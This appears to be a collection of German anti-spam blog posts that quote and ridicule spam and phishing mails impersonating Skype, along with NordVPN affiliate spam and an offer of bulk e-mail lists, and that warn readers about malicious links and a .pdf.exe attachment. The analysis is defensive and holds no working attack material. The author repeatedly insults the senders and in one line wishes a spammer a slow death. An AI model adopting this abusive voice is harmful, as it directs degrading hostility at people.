Übrigens: In „reffering“ von to refer fehlt zwar ein „r“, aber dafür ist ein „f“ zuviel. Nein, Englisch ist nicht meine Muttersprache, aber deine Schreibweise tut trotzdem weh.

Some of our registered partners earns over 50k USD/month in commissions from our affiliate program (nordvpn.com/affiliate).

Damit trotzdem ein paar Leute so blöd werden, wird mit möglichen 50 Kilodollar pro Monat gewunken, die einige völlig namenlose Gestalten angeblich damit machen, dass sie auf in der Spam ungenannten Websites ihre Besucher an Spammer verkaufen. Der Link, der das belegen soll, ist wieder in oben benannter Weise für Menschen mit halbwegs abgesicherten Webbrowsern unbrauchbar gemacht worden – auf eine zweite Demonstration der gleichen einfallslosen Nummer verzichte ich hier. Wer seinen Webbrowser ein bisschen absichert, ist vermutlich bereits zu intelligent, um auf diesen hilflos mit Geldscheinen wedelnden Spammer reinzufallen, und deshalb ist es dem Spammer egal.

How many privacy/security focused unique visits do you get per month?

Woher soll ich das wissen? Ich interessiere mich gar nicht mehr für solche Auswertungen und schreibe einfach das, was ich für wichtig und richtig halte. Und selbst, wenn ich darauf schaute: Was ich veröffentliche, ist offen, meine RSS-Feeds sind Volltexte, die Lizenz erlaubt beliebiges Spiegeln und Weiterverwenden (was auch geschieht). Willkommen im Internet, in dem Ideen und Inhalte frei fluktuieren können! Um in einem solchen Umfeld an Statistiken zu glauben, muss man schon ganz schön neurotisch sein. 😉

Aber gut, damit eine Zahl genannt wird: Ich schätze, es sind so zwanzig bis dreißig. 😉

If you prefer, we can jump into a Skype chat/call later this week. Available tomorrow, 10.30am, your time?

Hey, ich bin „privacy/security focused“ – da benutze ich doch nicht ausgerechnet Microsofts Skype mit seinen vorsätzlich verbauten Hintertüren zum Mitschneiden für jeden, der die Hintertüren kennt. Dass es überhaupt noch ein paar uninformierte Leute gibt, die diesen menschenrechtsverachtenden Müll benutzen, als ob es keine Alternativen gäbe! XMPP mit OTR ist wunderbar…

Best

Gintare

NordVPN

Ich wünsche dir auch alles Gute für deinen weiteren Lebensweg und viele Gespräche mit ein paar anständigen Menschen, die dir wieder beibringen, dich zu schämen! Deine mich asozial belästigende Spam habe ich zu meiner Entlastung gelöscht.

Attention, You have deferred mails seducer

Samstag, 21. November 2015

Vor jedem anderen Wort: Diese E-Mail…

Screenshot der Phishing-Mail

…kommt natürlich nicht von Skype. Sie hat niemals einen Server von Microsoft gesehen. Mein Exemplar wurde von einer dynamischen IP-Adresse eines italienischen Zugangsproviders aus versendet, stammt also mit an Sicherheit grenzender Wahrscheinlichkeit von einem mit krimineller Schadsoftware übernommenen Privatrechner.

Die Spam ist auch bei mir angekommen. Ich habe kein Microsoft-Konto, und ich habe niemals in meinem Leben Skype benutzt oder mich dafür registriert – ich bevorzuge nämlich Kommunikationskanäle, die dezentral sind und keine eingebaute Abhörschnittstelle haben.

Skype

Aha, du willst „Skype“ sein? Dein gefälschter Absender kam aber aus der Domain cramco (punkt) com. Ich meine ja nur: Wenn du schon einen Absender für deine kriminellen Drecksspams fälschst, kannst du das ja eigentlich auch ein bisschen überzeugender machen… ach, geht nicht, weil du ein dummer Vollpfosten bist? Na gut, dann bleib eben dumm, Spammer! Schade, dass man daran meist nur langsam stirbt.

You have deferred mail.

Aha, ich habe also keinen Namen, mit dem ich bei Skype registriert bin. Und verzögerte Post. Sehr überzeugend, vor allem, wenn der…

View mails.

…klicki klicki Link gar nicht zu Skype oder zu Microsoft geht, sondern in das Include-Verzeichnis eines mit einem Crack übernommenen WordPress-Blogs, das in griechischer Sprache geführt wird. Freundlicherweise hat der Hoster dieser Website auf einen Hinweis hin ganz schnell die kriminelle Scheiße weggemacht, aber es steht zu befürchten, dass du gerade tausende WordPress-Blogs gecrackt und in Phishing-Sites und Schadsoftwareschleudern verwandelt hast.

Von einem Klick kann ich übrigens nur abraten, denn die „kostenlose Sicherheitsüberprüfung“ und die Übernahme des Computers durch Kriminelle, wenn eine ausbeutbare Lücke auf dem Computer besteht, kommt gleich hinterher. Derartige Überrumpelungen sind oft tagesaktuell, so dass das (eh schon fragwürdige) Antivirus-Programm versagt. Dagegen hilft übrigens – neben der Benutzung möglichst aktueller Software und eines möglichst aktuellen Betriebssystemes – nur ein Browser-Addon wie NoScript zusammen mit der Browsereinstellung, dass Plugin-Inhalte erst nach explizitem Klick aktiviert werden. Unter den Bedingungen der voll entwickelten und technisch kompetenten Internet-Kriminalität der Zehner Jahre ist es einfach eine unfassbar dumme Idee, jeder übern Weg laufenden Website aus einem anonymisierenden Medium zu gestatten, dass sie Skriptcode im Browser ausführen kann. Es handelt sich schlicht um eine der ganzen Welt zur Verfügung gestellte Schnittstelle, Programme auf beliebigen Computern laufen zu lassen – weder Werber mit ihren gesteigerten „Bedürfnissen“ der klandestinen Rezipientenüberwachung noch Verbrecher mit ihren gesteigerten „Bedürfnissen“ nach Geld, Mailadressen, Kontakten, Namen, Anschriften, Bankkonten und Internetaccounts anderer Menschen können diesem Angebot widerstehen.

Cordially
Skype team

Wenn du Bratschädel, Matschbirne und Zwielichtgestalt das Skype-Team bist, dann ist mein Blog hier aber Hochliteratur! 😀

© 2015 Skype and/or Microsoft. The Skype name, associated trade marks and logos and the „S“ logo are trade marks of Skype or related entities. Skype Communications S.a.r.l. 23-29 Rives de Clausen, L-2165 Luxembourg.

So so, das bescheuert-einschüchternd proklamierte Urheberrecht auf eine Spam liegt also bei Skype und/oder bei Microsoft… vielleicht liegt es ja noch und/oder ganz woanders oder gar dazwischen. :mrgreen:

Wir haben Ihre Bestellung geliefert

Montag, 8. April 2013

Gefälschter Absender dieser Mail ist noreply (at) alerts (punkt) skype (punkt) com. Natürlich kommt diese Mail nicht von Skype.

Dies ist eine automatisierte E-Mail. Bitte antworten Sie nicht darauf.

Dies ist eine Spam. Machen sie einfach, was der Spammer von ihnen will, damit sich seine Kriminalität weiterhin lohnt. Antworten ist sinnlos, der Absender ist gefälscht.

Hallo!

Der Spammer weiß nicht, wer sie sind. Deshalb kann er sie nur mit dem hübschen, sehr geschäftsmäßig klingenden Namen „Hallo“ ansprechen und tut das auch.

www.skype.com

Der Spammer möchte über solche Sachen hinwegtäuschen, indem er Internetadressen von Firmen in seine Spam reinschreibt, mit denen er gar nichts zu tun hat.

Wir haben Ihre Bestellung geliefert

Das Produkt kann jetzt genutzt werden. Bei Problemen besuchen Sie bitte unseren Hilfebereich unter skype.com.

Der Spammer behauptet, dass er irgendeine Bestellung unbekannten Inhaltes geliefert hat, die jetzt genutzt werden kann. Um was es in dieser Bestellung geht, weiß er ebensowenig zu sagen, wie er zu sagen weiß, wie der Empfänger der „Lieferung“ denn nun heißt. Es ist „das Produkt“ für „Hallo“. Denn sobald der Spammer an dieser Stelle konkret wäre, könnte jeder Depp mit zwei Handvoll Restsynapsen die Spam als Spam erkennen und einfach löschen. Deshalb behilft sich der Spammer in seiner kriminellen Müllmail mit unbestimmten Angaben, die Eindruck machen sollen.

Allerdings ist der Spammer ein Spammer. Er hält nicht viel von Gründlichkeit oder passenden Formulierungen, was sich ja schon an der Anrede „Hallo“ zeigte; und dementsprechend mies ist der Teil der Spam formuliert, auf der es dem Spammer wirklich ankommt, nämlich der Hinweis auf die Schadsoftware im Mailanhang. Die restlichen Texte konnte er teilweise aus echten Mails von Skype übernehmen, aber das hier…

Die Einzelheiten Ihres Einkaufs In der befestigten Datei

…ist in Formulierung und falscher Großschreibung ziemlich aua. So so, eine „befestigte Datei“ gibt es. :mrgreen:

Der Spammer hat ein 34,1 KiB großes ZIP-Archiv an seine kriminelle Drecksspam gehängt. In diesem befindet sich eine einzige Datei, deren Dateiname auf .pdf.exe endet. Der Spammer hofft, mit diesem müden Trick aus dem Spam-Neolithikum den Eindruck erwecken zu können, dass es sich bei seiner Datei um ein PDF-Dokument handelt.

In Wirklichkeit – und deshalb hat der Spammer diesen lächerlichen Mummenschanz mit dem Dateinamen überhaupt nötig – handelt es sich um aktuelle Schadsoftware, die in diesem Moment nur von einem guten Fünftel der gängigen Antiviren-Schlangenöle erkannt wird. Wer sich auf die „halbe Sicherheit“ verlassen hat, dass seine „Schutzsoftware“ ihn vor einer kriminellen Übernahme seines Computers und seiner Internetleitung schützt, ist also wieder einmal in sehr vielen Fällen verlassen. Wer aber bei der Benutzung des Internet sein Gehirn einschaltet und dermaßen offensichtlichen Spammüll mit flinkem Finger in die Flammen schleudert, statt auch noch Dateianhänge zu öffnen und ausführbare Dateien auszuführen, ist auf der sicheren Seite.

Sie können den Status Ihrer Vereinbarung und die Ergebnisse Ihrer letzten Zahlungen online einsehen.

Der Spammer faselt etwas von „online“, aber setzt doch lieber keinen Link dazu, denn er will ja nicht, dass man eine Website besucht, sondern er will nur, dass man sich eine aktuelle Kollektion von Viren und Trojanern auf dem Rechner installiert.

Die regelmäßige Zahlung für Ihr Abonnement wird für jeden Abrechnungszeitraum am gleichen Tag (soweit dies möglich ist) erfolgen. Wenn Sie Ihr Abonnement kündigen, tritt diese Kündigung erst am Ende des letzten Abrechnungszeitraums in Kraft.

Und damit der Spammer da auch genug psychischen Hebel hintersetzt, fabuliert er von „Kosten“ für irgendein „Abonnement“ bei „Skype“. Einmal ganz davon abgesehen, dass ein Vertrag nicht dadurch zustande kommt, dass irgendeine Klitsche einem eine „Rechnung“ für irgendein Produkt zustellt und dass man solche „Rechnungen“ deshalb getrost in die Mülltonne stecken kann, ohne in irgendeiner Weise darauf reagieren zu müssen – dieser Text hat es in sich, denn er ist ein richtiger Hirnkitzel mit psychoaktivem Faseldrive. Was sagt denn dieser kleine Absatz über die Bezahlung? Sie erfolgt immer am gleichen Tag. An welchem? Ähm… wer zum Porz sollte sich dafür interessieren. Außerdem gilt dieses „immer“ nur, soweit es möglich ist. Wie könnte es einmal nicht möglich sein? Keine Ahnung. Und wie lang ist der Abrechnungszeitraum? Auch das wird nicht erwähnt. Hier steht ein ganzer wortvergewaltigender Absatz, in dem sich keine einzige konkrete Aussage zu diesem kleinen Sachverhalt finden lässt, um den es angeblich darin geht: Zur Bezahlung. Der Versuch, so ein Nichts in einschüchternder Kälte zu formulieren, um mit der so erzeugten Angst das Gehirn des Empfängers auszuknipsen, wirkt vor allem lachhaft. Aber auch hier gilt, ebenso wie beim Inhalt der angeblichen „Bestellung“, dass jede konkrete Angabe den Spamcharakter dieser Müllmail offensichtlich machen würde, und deshalb können es die Verbrecher nicht besser machen.

Bis bald
Ihr Skype-Team

Nun, diese Mail kommt nicht von irgendeinem Skype-Team. Aber das sagte ich schon eingangs.

Den Rest des Mülltextes, der vermutlich aus echten Mails von Skype übernommen wurde, zitiere ich hier nicht.

Electronic messaging service

Mittwoch, 23. Mai 2012

We offer electronic messaging service

Available databases: (We have any database if you need)

USA 160 000 000 @ – 1000 EUR per one time emailing
DE 63 000 000 @ – 700 EUR per one time emailing
CA 43 000 000 @ – 500 EUR per one time emailing
UK 39 000 000 @ – 500 EUR per one time emailing
FR 38 000 000 @ – 500 EUR per one time emailing
EU (can offer any country separately) 430 000 000 address – 1000 EUR
Commonwealth of Independent States (CIS) 32 000 000 address – 400 EUR
Russia 23 000 000 address – 200 EUR

HIGH QUALITY EMAILING!!! THE LOW PRICE!!! [sic!]

skype: imaixxxx [von mir unkenntlich gemacht]

Was ihr in eurem wie aus dem Chinesischen übersetzt klingendem Textstummel als „elektronischen Nachrichtenservice“ bezeichnet, nennt der Rest der internetnutzenden Welt übrigens nach alter Gewohnheit einfach und treffend Spam. Ach, wisst ihr selbst, deshalb spammt ihr mich ja auch zu. Na, dann…

Die interessante Neuerung an dieser Masche ist, dass als Kontaktmöglichkeit nicht eine Website oder eine Mailadresse angeboten wird, sondern eine Skype-ID. Es war mir leider auch nach längerem Suchen auf der Skype-Website [bewusst nicht verlinkt] nicht möglich, eine Kontaktmöglichkeit zum Melden eines derartigen Missbrauchs zu finden, und eine Anmeldung bei Skype nur für die Möglichkeit, etwas im Support-Forum mitzuteilen, finde ich doch etwas zu hochschwellig, als dass ich diesen Weg zu gehen bereit bin. Genau das halte ich auch für den Grund, weshalb diese kriminellen Spammer Skype für sich entdeckt haben. Ihnen droht dort einfach weniger Widerstand als andernorts im Internet, wo man schnell und einfach einen Missbrauch melden kann.

Nun gut, es ist ja nur der Ruf von Skype, der den Bach runtergeht, wenn man als Spamgenießer nichts dagegen tun kann, dass solche Halunken ihr asoziales Businessmodell mit Skype-Hilfe durchziehen können… und damit nicht mein Problem. Aber falls hier jemand von Skype mitliest: Das muss dringend anders werden!

elias Recovery

Mittwoch, 16. Juni 2010

Vorab gesagt: Skype hat mit dieser Mail nichts zu tun. Die Firmierung wurde von kriminellen Spammern missbraucht. Dass Skype mit dieser Mail nichts zu tun hat, sieht man übrigens schon, wenn man die Absenderadresse betrachtet – denn es ist nicht davon auszugehen, dass Skype seine Kunden über einen kostenlosen Freemail-Account beim schwedischen Yahoo anmailen würde, ganz so, als ob eine renommierte Internet-Unternehmung keine Server betreiben könnte.

This is an automated email, please don’t reply.

Das glaube ich euch aufs Wort.

Hello, elias

Hey, aber ihr könnt immer den Namen vor dem @ in der Mailadresse abschreiben. So viel „Leistung“ kriegt nicht jeder Spammer hin. Und was wollt ihr nun von mir?

Password token

Reset your password with this temporary code

If the link doesn’t work, you can enter the code manually using this token: cccc60e59383a70e51b62a70e59fe51b

Ich wette ja, dass in jeder dieser Müllmail die gleiche sedezimale Zahl steht. Aber wo zum Henker soll ich jetzt eigentlich mein Passwort zurücksetzen?

Talk soon,
The people at Skype

Ah, bei Skype. Da habe ich aber gar keinen Account. Und dazu gibt es gleich noch ein paar weitere entzückende Links:

Lost Password Account Settings Help Terms of Service Privacy

Wie süß! Alle diese Links führen auf die gleiche brotdumme URL auf dem Server www (punkt) raubold (strich) heiner (punkt) de, ganz ohne jeden Paramter oder irgendwas. Wenn man sich diese Seite anschaut (auf einem nicht besonders gesicherten System ist das wirklich dumm), denn sieht man ein hübsches Angebot von Pimmelpillen. Ich gehe übrigens davon aus, dass diese Website auf kriminellen Wege übernommen wurde, denn diese Domain existiert seit Ende 2007, was nicht in das Schema der Pimmelpillen-Betrüger passt. Diese betreiben ihre Websites meist nur für wenige Wochen. Es handelt sich zurzeit um eine Weiterleitung auf die „richtige“ Betrüger-Domain direktkur (punkt) com, die eher dem üblichen Schema entspricht, denn sie wurde erst am 29. Mai dieses Jahres registriert und lässt trotz des „tollen“ Layouts…

Screenshot der Website

…das übrigens dem gegenwärtigen Standard der Pimmelpillen-Spammer entspricht, nicht den Verdacht aufkommen, dass es hier einem ernsthaften Händler um Kundenbindung gehen könnte. Tut es ja auch nicht, es geht hier ein paar plumpen, asozialen Idioten darum, andere Leute zu betrügen.

Wie die Spammer nun allerdings auf die Idee kommen, dass jemand bei einem windigen „Händler“ irgendwelche Pillen kaufen könnte, nachdem er so mit einer „Mail von Skype“ irregeführt wurde, dass es wirklich noch der Blindeste bemerken muss, das bleibt das Geheimnis der kriminellen und dummen Spammer und Website-Cracker.

Damit die Mail auch ein bisschen mehr nach Skype aussieht, haben die Idioten da ein paar weitere Zeilen aus einer vermutlich typischen Skype-Mail reinkopiert:

If You Are Still Having Problems
If you‘re still having difficulty retrieving your password please contact a support agent via https://support.skype.com/support_request

Im Gegensatz zu Skype (wie ich vermute) kommen die allerdings nicht auf die Idee, die Internetadresse des Skype-Supports mal zu verlinken. Na ja, sind ja wirklich genug Links in der Spam.

Protect Your Password
Skype staff will NEVER ask you for your password via email. The only places you are asked for your password are when you sign in to Skype or on our website if you want to buy something or check your account. You will always sign in via a secure connection, and we ask you to ensure that the address in your browser begins exactly like this https://secure.skype.com It should also show a little padlock symbol to indicate the secure connection.

Schon klar. Wer das liest, bemerkt vielleicht sogar, dass die Links in der Spam nicht gerade mit dieser Zeichenfolge beginnen… :mrgreen:

2003-2010 Skype Limited
Skype, associated trademarks and logos and the „S“ symbol are trademarks of Skype Limited..

Und was hier ein Markenzeichen von wem ist, das kümmert die Kriminellen auch nicht weiter. Der Ruf einer Firma kann ja ruhig in den Schmutz gezogen werden, wenn man Leuten das Geld aus der Tasche ziehen will. Schade nur, dass sich Spammer auf ihre Anonymität verlassen können und dass so selten ein Spammer vor Gericht steht. Deshalb müssen eben alle anderen bei der Internet-Benutzung ihr Gehirn einschalten.